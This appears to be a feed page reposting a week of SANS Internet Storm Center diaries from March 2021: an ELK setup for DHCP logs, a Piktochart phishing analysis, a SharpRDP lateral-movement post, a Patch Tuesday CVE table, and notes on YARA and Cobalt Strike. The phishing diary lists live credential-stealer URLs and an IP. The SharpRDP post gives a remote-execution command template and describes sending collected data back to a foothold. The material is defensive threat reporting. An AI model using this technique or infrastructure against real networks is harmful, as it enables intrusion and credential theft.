SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 2 óra 24 perc
2021. március 12.

Microsoft DHCP Logs Shipped to ELK, (Fri, Mar 12th)

This parser takes the logs from a Windows 2012R2 server (C:\Windows\System32\dhcp) and parses them into usable metatada which can be monitored via a dashboard. The logs have been mapped using ECS in the same format as the packetbeat meta here [1].

→ First step is to load the Microsoft DHCP templates [3][4] via Kibana Dev Tools to create the microsoft.dhcp Index Management and Index Lifecycle Policy. Follow the instructions at the top of each of template.

→ Second step is to install Logstash (if not already done) and add to Logstash [2] configuration file (i.e. /etc/logstash/conf.d/logstash-filter-dhcp.conf).

The configuration file contains a Logstash filter use to compare the host MAC address OUI against a local list (in this configuration it is: oui.yml). Get OUI list from the web and convert it into a yml list saved in the /opt directory.

- In Linux, using wget, download the file:

  • wget http://standards-oui.ieee.org/oui/oui.txt

- Create the list in the /opt directory and run the following command to create the OUI file (this regex will delete tabs, spaces and @ ):

  • # cat /opt/oui.txt | grep 'base 16' |sed -e 's/\([[:xdigit:]]\{6\}\).*(base 16)\t\t\(.*\)\r/"\1": \2/gi' | tr -d '@' > /opt/oui.yml

Start the Logstash service and verify under Stack Mangement → Index Management for an indice similar to microsoft.dhcp-2021.03.12-000001 created.

→ Third step is to install filebeat on the Windows server, configured as a service and change the filebeat.yml configuration to only contain the following information. Change the IP address in this file to the IP address of the logstash service:

# This filebeat shipper is used with
# for Microsoft DHCP logs

# 9 Jan 2021
# Version: 1.0

filebeat.inputs:

# Filebeat input for Microsoft DHCP logs

- type: log
  paths:
    - "C:/Windows/System32/dhcp/DhcpSrvLog-*.log"
  include_lines: ["^[0-9]{2},"]
  fields_under_root: true

#==================== Queued Event ====================
#queue.mem:
#  events: 4096
#  flush.min_events: 512
#  flush.timeout: 5s

#queue.disk:
#  path: "/op/filebeat/diskqueue"
#  max_size: 10GB

#==================== Output Event ====================
output.logstash:
  hosts: ["192.168.2.23:5044"]


At this point, the logs should start going to ELK. From the Windows server, verify the connection has been established by running at the command line: netstat -an | findstr 5044

In the Elasticsearch server, under Stack Management -> Index Management, lock for an new instance with microsoft.dhcp-* (something like this: microsoft.dhcp-2021.03.12-000001) should start showing new metadata has been received.

→ Last step is to load the dashboard [5] to Elasticsearch under Stack Management -> Saved Objects and Import the file Microsoft_DHCP_7.11_v1.ndjson, this will load the new dashboard and the Index Pattern.

The dashboard should have this look and feel:

The DHCP log format being parsed:


ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name, TransactionID, QResult,Probationtime, CorrelationID,Dhcid,VendorClass(Hex),VendorClass(ASCII),UserClass(Hex),UserClass(ASCII),RelayAgentInformation,DnsRegError.

Since DHCP is a protocol that do not need any authentication from the client, any clients within the network can obtain a lease for an IP. It is good housekeeping to monitor and be on the lookout for strange hostnames and unknown or unidentified vendor MAC addresses, to monitor what is accessing the network.


[1] https://www.elastic.co/guide/en/beats/packetbeat/master/exported-fields-dhcpv4.html
[2] https://handlers.sans.edu/gbruneau/elk/logstash-filter-dhcp.conf
[3] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_ilm_policy.txt
[4] https://handlers.sans.edu/gbruneau/elk/Windows_DHCP_template.txt
[5] https://handlers.sans.edu/gbruneau/elk/Microsoft_DHCP_7.11_v1.ndjson
[6] https://isc.sans.edu/forums/diary/Secure+Communication+using+TLS+in+Elasticsearch/26902/
[7] https://www.elastic.co/guide/en/ecs/1.8/ecs-field-reference.html
[8] https://handlers.sans.edu/gbruneau/elastic.htm

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 12.

ISC Stormcast For Friday, March 12th, 2021 https://isc.sans.edu/podcastdetail.html?id=7410, (Fri, Mar 12th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 11.

Piktochart - Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]


In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail[1] and pretending to be an Outlook version update[2], we've recently learned of a phishing campaign targetting users of the Infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools.  This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool, like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

Piktochart has about 2,000 registered users, and about 24 million Piktocharts Created and is used by companies such as Forbes, TechCrunch, and others, according to their website.  With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing:  Their registered "Pro users" can download an actual .pdf file, with the malicious link intact, or as well render the file into several different sizes of .png images, as indicated in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew, whose account had already been compromised.  If they click the link, a 2nd stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org.  This base domain currently has "0 out of 87" vendors reporting it as malicious on Virus Total, and is made out to be a non-profit in Lagos, Nigeria.  This specific example had a different site registration than most of the other, identical sites I've researched, so it is possible this site was the result of a takeover of a legitimate business' WordPress website, or a redirection of the site's DNS.


Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft 0365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites.   There are  quite a few  domains on the same IP[5], for example: 

pwan-heritage(.)com/pol/OfficeV4/*    
secure-official-spotify.pwanplus(.)com       
www.dhl-delivery-failure-resolve.naijamail.com  - This one includes a nice-looking DHL form [6]


Indicators of compromise - IOCs  

URLS/Domains
create.piktochart.com/output/52653368-my-visual
piktochart.com (if not needed for businses)

2nd stage/stealer
obggladdenlightfoundation.org/dfsmith/ofc3
obggladdenlightfoundation.org/dfsmith/ofc3/
obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf6668
obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf666

IP
%%ip:173.231.197.145%% [7]
Hostname:    ded5495.inmotionhosting.com

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microssoft cred stealer image - hashes(sha2) 
7, 10, and 3kb versions of the same image
a90370dc587b73cd2dbe33504794e83c83dc9f365cd9cd94511593046db5ae09
bc2afe6e49541902541497a6823e1aa0f8e8683e203d4da6bc75590bddebeb702bed6013d59910f6714448cafeda98708886d48978b6b991627526964379efc0

DOM (cred-stealer page)
"
<form id="1MDAwMDMxMjAyMS0wMy0wMjE2MTQ2NTgwMDQ4NTgxMTAx"> <input type="hidden" value="[removed]"><input type="hidden" value="[removed"> </form>
"

Post request
"form id="f2" method="post" action="#" style="margin-bottom: 0px;"> <input required="" type="email" placeholder="Email, phone, or Skype" name="e"
    style="outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;"> <img
    src="data:image/png;base64"...

Cookies
obggladdenlightfoundation.org/    1969-12-31
23:59:59    Name: PHPSESSID
obggladdenlightfoundation.org/dfsmith/ofc3/s    1969-12-31
23:59:59    Name: ip11


 JB Bowers
@cherokeejb_

References:
[1] - https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110
[2] - https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
[3] - https://apageinsec.wordpress.com/
[4] - https://create.piktochart.com/output/52653368-my-visual
[5] - https://urlscan.io/result/e02ea839-9671-4d31-a039-effd54877c0b/related/
[6] - https://urlscan.io/screenshots/205111b7-b981-48e9-9359-df55f278163b.png
[7] - https://isc.sans.edu/ipinfo.html?ip=173.231.197.145

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 11.

ISC Stormcast For Thursday, March 11th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7408, (Thu, Mar 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 10.

If you have an F5, it's time to patch&#x21; Thanks Michele for the link to today's crop of F5 CVE's, which include an unauthenticated RCE against the API, and another RCE against "hidden" config pages&#x21; https://support.f5.com/csp/article...

=============== Rob VandenBrink coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 10.

SharpRDP - PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of remediation folks have these days to catch malicious execution of powershell or the use of tools like psexec, red teams have to be asking themselves - what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn't an option, SharpRDP makes a pretty easy "next tool on the shelf"

SharpRDP takes advantage of the fact that Microsoft took a lot of pages from the Citrix ICA protocol when they put the RDP protocol together.  RDP isn't just for remote desktop - it implements "channels" which can be used for all sorts of things.  In the past, the most common use of channels in ICA is to differentiate printer traffic from interactive traffic, and apply different QOS policies to it.  But SharpRDP takes it to the next level, and allows you to start a session, and instruct it to execute code after it starts!

For the red team, this has oodles of attraction - often you don't have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally "GUI" protocol.  Since it's in an RDP session, it's an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly.  While you could theoretically run a CLI terminal session over this, I'm not sure that this is implemented - I haven't needed to figure that piece out yet if it is.  

For someone on the blue team, this is a tough thing to catch - it's going to look like any other RDP session that your admins might make, executing "something" after it starts.  

What does a session look like?  It's as simple as:

>SharpRDP.exe computername=targetservername command="<some command>" username=<domain>>\<userid> password=<password string>
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing <some command>
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I'll have the "command" be a CMD file that does whatever I'm trying to accomplish - usually it's data collection of some kind, with the data coming back to the host that I have my foot-hold on.  Remember that if your command is not an actual executable (for instance, "dir" is not an executable file. it's part of cmd.exe), you will have to use "c:\windows\system32\cmd.exe /c<command>" to load the cmd interpreter prior to executing your "thing".

My go-to is single letter CMD files, so for instance t.cmd.  This file is usually homed on my foot-hold server, and sends the data back to a share on that same server.  Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (an not have name collisions).

Protections?  LAPS is a good one - if every target host has a different password, you'll have to collect all of that first before you can use SharpRDP.  (https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/).  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn't too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I've got a few clients running this, and it's pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it's a "click OK" or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you've got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and your detection that you can code into your SIEM is whatever event is generated by "failed MFA on RDP".  Your protection in that case is "alert on any new registration of MFA users".  You'll want any registration of new users, or new phones to existing users to go to a number of people - once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021 - there are a lot of people working on fixing this though.  The uptick in migrating VPN's and Citrix Gateways to newer MFA solutions means that it's becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.

SharpRDP is homed here:
https://github.com/0xthirteen/SharpRDP
And has a full write-up here:
https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3

 

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 10.

ISC Stormcast For Wednesday, March 10th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7406, (Wed, Mar 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 9.

Microsoft March 2021 Patch Tuesday, (Tue, Mar 9th)

This month we got patches for 122 vulnerabilities. Of these, 14 are critical, 5 are being exploited and 2 were previously disclosed. 

The highlight for this month goes to the Microsoft Exchange Server vulnerabilities that are being exploited and for which Microsoft has made available the emergency patches on March 2. If you have this software in your environment, especially if the service is exposed to the internet, and did not apply the patches, in addition to apply the patches, it is imperative that you check if your system could have been already compromised. Johannes published a diary summarizing the vulnerabilities and giving advices on how to check for evidence of compromise.

In addition to the 4 Microsoft Exchange Server vulnerabilities, there is a fifth vulnerability being exploited which have been previously disclosed. This is a RCE affecting Microsoft Edge and Internet Explorer 11 (CVE-2021-26411) on multiple Windows versions. According to the vulnerability advisory, to exploit this vulnerability, an attacker would have to convince a user to access a malicious website, like in a phishing scenario. The exploit is publicly disclosed, and exploitations were already detected. 

The highest CVSS score this month (9.90) was given to the Windows Hyper-V Remote Code Execution Vulnerability (CVE-2021-26867). The vulnerability advisory says that any Hyper-V client which is configured to use the Plan 9 file system could be vulnerable. An authenticated attacker who successfully exploited this vulnerability on a Hyper-V client could cause code to execute on the Hyper-V server.

And for the second month in a row, there is a critical RCE vulnerability affecting Windows DNS Server (CVE-2021-26897) with a CVSS of 9.80. According to the advisory, the vulnerability affects any DNS Server – being it a standalone DNS Primary Authoritative Server or a DNS Server integrated with Active Directory. It also informs that to be vulnerable, a DNS server would need to have dynamic updates enabled. 

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) Application Virtualization Remote Code Execution Vulnerability %%cve:2021-26890%% No No Less Likely Less Likely Important 7.8 6.8 Azure Sphere Unsigned Code Execution Vulnerability %%cve:2021-27074%% No No Less Likely Less Likely Critical 6.2 5.6 %%cve:2021-27080%% No No Less Likely Less Likely Critical 9.3 9.3 Azure Virtual Machine Information Disclosure Vulnerability %%cve:2021-27075%% No No Less Likely Less Likely Important 6.8 6.1 Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG %%cve:2020-27844%% No No - - -     Chromium CVE-2021-21159: Heap buffer overflow in TabStrip %%cve:2021-21159%% No No - - -     Chromium CVE-2021-21160: Heap buffer overflow in WebAudio %%cve:2021-21160%% No No - - -     Chromium CVE-2021-21161: Heap buffer overflow in TabStrip %%cve:2021-21161%% No No - - -     Chromium CVE-2021-21162: Use after free in WebRTC %%cve:2021-21162%% No No - - -     Chromium CVE-2021-21163: Insufficient data validation in Reader Mode %%cve:2021-21163%% No No - - -     Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS %%cve:2021-21164%% No No - - -     Chromium CVE-2021-21165: Object lifecycle issue in audio %%cve:2021-21165%% No No - - -     Chromium CVE-2021-21166: Object lifecycle issue in audio %%cve:2021-21166%% No No - - -     Chromium CVE-2021-21167: Use after free in bookmarks %%cve:2021-21167%% No No - - -     Chromium CVE-2021-21168: Insufficient policy enforcement in appcache %%cve:2021-21168%% No No - - -     Chromium CVE-2021-21169: Out of bounds memory access in V8 %%cve:2021-21169%% No No - - -     Chromium CVE-2021-21170: Incorrect security UI in Loader %%cve:2021-21170%% No No - - -     Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation %%cve:2021-21171%% No No - - -     Chromium CVE-2021-21172: Insufficient policy enforcement in File System API %%cve:2021-21172%% No No - - -     Chromium CVE-2021-21173: Side-channel information leakage in Network Internals %%cve:2021-21173%% No No - - -     Chromium CVE-2021-21174: Inappropriate implementation in Referrer %%cve:2021-21174%% No No - - -     Chromium CVE-2021-21175: Inappropriate implementation in Site isolation %%cve:2021-21175%% No No - - -     Chromium CVE-2021-21176: Inappropriate implementation in full screen mode %%cve:2021-21176%% No No - - -     Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill %%cve:2021-21177%% No No - - -     Chromium CVE-2021-21178 : Inappropriate implementation in Compositing %%cve:2021-21178%% No No - - -     Chromium CVE-2021-21179: Use after free in Network Internals %%cve:2021-21179%% No No - - -     Chromium CVE-2021-21180: Use after free in tab search %%cve:2021-21180%% No No - - -     Chromium CVE-2021-21181: Side-channel information leakage in autofill %%cve:2021-21181%% No No - - -     Chromium CVE-2021-21182: Insufficient policy enforcement in navigations %%cve:2021-21182%% No No - - -     Chromium CVE-2021-21183: Inappropriate implementation in performance APIs %%cve:2021-21183%% No No - - -     Chromium CVE-2021-21184: Inappropriate implementation in performance APIs %%cve:2021-21184%% No No - - -     Chromium CVE-2021-21185: Insufficient policy enforcement in extensions %%cve:2021-21185%% No No - - -     Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning %%cve:2021-21186%% No No - - -     Chromium CVE-2021-21187: Insufficient data validation in URL formatting %%cve:2021-21187%% No No - - -     Chromium CVE-2021-21188: Use after free in Blink %%cve:2021-21188%% No No - - -     Chromium CVE-2021-21189: Insufficient policy enforcement in payments %%cve:2021-21189%% No No - - -     Chromium CVE-2021-21190 : Uninitialized Use in PDFium %%cve:2021-21190%% No No - - -     DirectX Elevation of Privilege Vulnerability %%cve:2021-24095%% No No More Likely More Likely Important 7.0 6.1 Git for Visual Studio Remote Code Execution Vulnerability %%cve:2021-21300%% No No Less Likely Less Likely Critical 8.8 7.7 HEVC Video Extensions Remote Code Execution Vulnerability %%cve:2021-24089%% No No Less Likely Less Likely Critical 7.8 6.8 %%cve:2021-24110%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26902%% No No Less Likely Less Likely Critical 7.8 6.8 %%cve:2021-27047%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27048%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27049%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27050%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27051%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27061%% No No Less Likely Less Likely Critical 7.8 6.8 %%cve:2021-27062%% No No Less Likely Less Likely Important 7.8 6.8 Internet Explorer Memory Corruption Vulnerability %%cve:2021-26411%% Yes Yes Detected Detected Critical 8.8 7.9 Internet Explorer Remote Code Execution Vulnerability %%cve:2021-27085%% No No Less Likely Less Likely Important 8.8 7.9 Microsoft Excel Remote Code Execution Vulnerability %%cve:2021-27053%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27054%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Exchange Server Remote Code Execution Vulnerability %%cve:2021-26412%% No No Less Likely Less Likely Critical 9.1 8.2 %%cve:2021-26854%% No No Less Likely Less Likely Important 6.6 5.8 %%cve:2021-26855%% No Yes Detected Detected Critical 9.1 8.4 %%cve:2021-26857%% No Yes More Likely Detected Critical 7.8 7.2 %%cve:2021-26858%% No Yes Detected Detected Important 7.8 7.2 %%cve:2021-27065%% No Yes Detected Detected Critical 7.8 7.2 %%cve:2021-27078%% No No Less Likely Less Likely Important 9.1 8.2 Microsoft Office ClickToRun Remote Code Execution Vulnerability %%cve:2021-27058%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Office Remote Code Execution Vulnerability %%cve:2021-24108%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27057%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-27059%% No No Less Likely Less Likely Important 7.6 6.6 Microsoft Power BI Information Disclosure Vulnerability %%cve:2021-26859%% No No Less Likely Less Likely Important 7.7 6.7 Microsoft PowerPoint Remote Code Execution Vulnerability %%cve:2021-27056%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft SharePoint Server Information Disclosure Vulnerability %%cve:2021-27052%% No No Less Likely Less Likely Important 5.3 4.8 Microsoft SharePoint Server Remote Code Execution Vulnerability %%cve:2021-27076%% No No More Likely More Likely Important 8.8 7.7 Microsoft SharePoint Spoofing Vulnerability %%cve:2021-24104%% No No Less Likely Less Likely Important 4.6 4.2 Microsoft Visio Security Feature Bypass Vulnerability %%cve:2021-27055%% No No Less Likely Less Likely Important 7.0 6.1 Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability %%cve:2021-26887%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Windows Media Foundation Remote Code Execution Vulnerability %%cve:2021-26881%% No No Less Likely Less Likely Important 7.5 6.5 OpenType Font Parsing Remote Code Execution Vulnerability %%cve:2021-26876%% No No Less Likely Less Likely Critical 8.8 7.7 Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability %%cve:2021-27082%% No No - - Important 7.8 6.8 Remote Access API Elevation of Privilege Vulnerability %%cve:2021-26882%% No No Less Likely Less Likely Important 7.8 6.8 Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability %%cve:2021-27083%% No No Less Likely Less Likely Important 7.8 6.8 Storage Spaces Controller Elevation of Privilege Vulnerability %%cve:2021-26880%% No No Less Likely Less Likely Important 7.8 6.8 User Profile Service Denial of Service Vulnerability %%cve:2021-26886%% No No Less Likely Less Likely Important 5.5 4.8 Visual Studio Code ESLint Extension Remote Code Execution Vulnerability %%cve:2021-27081%% No No Less Likely Less Likely Important 7.8 6.8 Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability %%cve:2021-27084%% No No Less Likely Less Likely Important     Visual Studio Code Remote Code Execution Vulnerability %%cve:2021-27060%% No No Less Likely Less Likely Important 7.8 6.8 Windows 10 Update Assistant Elevation of Privilege Vulnerability %%cve:2021-27070%% No No Less Likely Less Likely Important 7.3 6.4 Windows ActiveX Installer Service Information Disclosure Vulnerability %%cve:2021-26869%% No No Less Likely Less Likely Important 5.5 4.8 Windows Admin Center Security Feature Bypass Vulnerability %%cve:2021-27066%% No No Less Likely Less Likely Important 4.3 3.8 Windows App-V Overlay Filter Elevation of Privilege Vulnerability %%cve:2021-26860%% No No Less Likely Less Likely Important 7.8 6.8 Windows Container Execution Agent Elevation of Privilege Vulnerability %%cve:2021-26865%% No No Less Likely Less Likely Important 8.8 7.7 %%cve:2021-26891%% No No Less Likely Less Likely Important 7.8 6.8 Windows DNS Server Denial of Service Vulnerability %%cve:2021-26896%% No No Less Likely Less Likely Important 7.5 6.5 %%cve:2021-27063%% No No Less Likely Less Likely Important 7.5 6.5 Windows DNS Server Remote Code Execution Vulnerability %%cve:2021-26877%% No No More Likely More Likely Important 9.8 8.5 %%cve:2021-26893%% No No Less Likely Less Likely Important 9.8 8.5 %%cve:2021-26894%% No No Less Likely Less Likely Important 9.8 8.5 %%cve:2021-26895%% No No Less Likely Less Likely Important 9.8 8.5 %%cve:2021-26897%% No No More Likely More Likely Critical 9.8 8.5 Windows Error Reporting Elevation of Privilege Vulnerability %%cve:2021-24090%% No No Less Likely Less Likely Important 7.8 6.8 Windows Event Tracing Elevation of Privilege Vulnerability %%cve:2021-26872%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26898%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26901%% No No Less Likely Less Likely Important 7.8 6.8 Windows Event Tracing Information Disclosure Vulnerability %%cve:2021-24107%% No No Less Likely Less Likely Important 5.5 4.8 Windows Extensible Firmware Interface Security Feature Bypass Vulnerability %%cve:2021-26892%% No No Less Likely Less Likely Important 6.2 5.6 Windows Graphics Component Elevation of Privilege Vulnerability %%cve:2021-26868%% No No More Likely More Likely Important 7.8 6.8 Windows Graphics Component Remote Code Execution Vulnerability %%cve:2021-26861%% No No Less Likely Less Likely Important 7.8 6.8 Windows Hyper-V Remote Code Execution Vulnerability %%cve:2021-26867%% No No Less Likely Less Likely Critical 9.9 8.6 Windows Installer Elevation of Privilege Vulnerability %%cve:2021-26862%% No No Less Likely Less Likely Important 6.3 5.5 Windows Media Photo Codec Information Disclosure Vulnerability %%cve:2021-26884%% No No Less Likely Less Likely Important 5.5 4.8 Windows NAT Denial of Service Vulnerability %%cve:2021-26879%% No No Less Likely Less Likely Important 7.5 6.5 Windows Overlay Filter Elevation of Privilege Vulnerability %%cve:2021-26874%% No No Less Likely Less Likely Important 7.8 6.8 Windows Print Spooler Elevation of Privilege Vulnerability %%cve:2021-1640%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26878%% No No Less Likely Less Likely Important 7.8 6.8 Windows Projected File System Elevation of Privilege Vulnerability %%cve:2021-26870%% No No Less Likely Less Likely Important 7.8 6.8 Windows UPnP Device Host Elevation of Privilege Vulnerability %%cve:2021-26899%% No No Less Likely Less Likely Important 7.8 6.8 Windows Update Service Elevation of Privilege Vulnerability %%cve:2021-26866%% No No Less Likely Less Likely Important 7.1 6.2 Windows Update Stack Elevation of Privilege Vulnerability %%cve:2021-26889%% No No Less Likely Less Likely Important 7.1 6.2 Windows Update Stack Setup Elevation of Privilege Vulnerability %%cve:2021-1729%% No No Less Likely Less Likely Important 7.1 6.2 Windows User Profile Service Elevation of Privilege Vulnerability %%cve:2021-26873%% No No Less Likely Less Likely Important 7.0 6.1 Windows Virtual Registry Provider Elevation of Privilege Vulnerability %%cve:2021-26864%% No No Less Likely Less Likely Important 8.4 7.3 Windows WalletService Elevation of Privilege Vulnerability %%cve:2021-26871%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26885%% No No Less Likely Less Likely Important 7.8 6.8 Windows Win32k Elevation of Privilege Vulnerability %%cve:2021-27077%% Yes No Less Likely Less Likely Important 7.8 7.0 %%cve:2021-26863%% No No More Likely More Likely Important 7.0 6.1 %%cve:2021-26875%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2021-26900%% No No Less Likely Less Likely Important 7.8 6.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 9.

ISC Stormcast For Tuesday, March 9th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7404, (Tue, Mar 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 8.

YARA and CyberChef, (Mon, Mar 8th)

If you prefer a graphical user interface to match YARA rules, you can try CyberChef.

YARA is a pattern matching tool, known as "The pattern matching swiss knife".

CyberChef is a web app for all kinds of (file) analysis techniques, known as "The Cyber Swiss Army Knife".

And what do you get when you combine 2 Swiss Knifes? One really big Swiss Knife :-)

CyberChef supports YARA rules.

Here I added one YARA rule to detect Office files with VBA macros. More precisely: ole files that contain the premise of a compressed, default VBA source code header.

YARA rules that match the input (a Word document, .doc,  with VBA code in this example) are listed in the output.

Since CyberChef also has an unzip function, you can apply YARA rules on the files contained in a ZIP file (something the YARA tool itself can not do):

If you want to copy the recipes, they are below.

Just YARA:

https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

UNZIP + YARA:

https://gchq.github.io/CyberChef/#recipe=Unzip('',false)YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

And know I need to close my tabs and let the browser update itself :-) .

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 8.

ISC Stormcast For Monday, March 8th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7402, (Mon, Mar 8th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 7.

PCAPs and Beacons, (Sun, Mar 7th)

I like taking a closer look at captures files posted by Brad. In his latest diary entry, we have a capture file with Cobalt Strike traffic.

With regular expression "^/....$" I look for URIs that are typical for Cobalt Strike shellcode (and Metasploit too):

Following this HTTP stream, I see data that looks encoded and has some repetitions, so this might be some kind of XOR encoding:

I export this data stream as a file:

Then pass it through my 1768.py Cobalt Strike beacon analysis tool:

And this is indeed the configuration of a beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 6.

Spotting the Red Team on VirusTotal&#x21;, (Sat, Mar 6th)

Many security researchers like to use the VirusTotal platform. The provided services are amazing: You can immediately have a clear overview of the dangerousness level of a file but... VirusTotal remains a cloud service. It means that, once you uploaded a file to scan it, you have to consider it as "lost" and available to a lot of (good or bad) people! In the SANS FOR610 training ("Reverse Engineering Malware"), we insist on the fact that you should avoid uploading a file to VT!  The best practice is to compute the file hash then search for it to see if someone else already uploaded the same sample. If you're the first to upload a file, its creator can be notified about the upload and learn that he has been detected. Don't be fooled: attackers have also access to VirusTotal and monitor activity around their malware! Note that I mention VirusTotal because it is very popular but is not the only service providing repositories of malicious files, they are plenty of alternative services to scan and store malicious files.

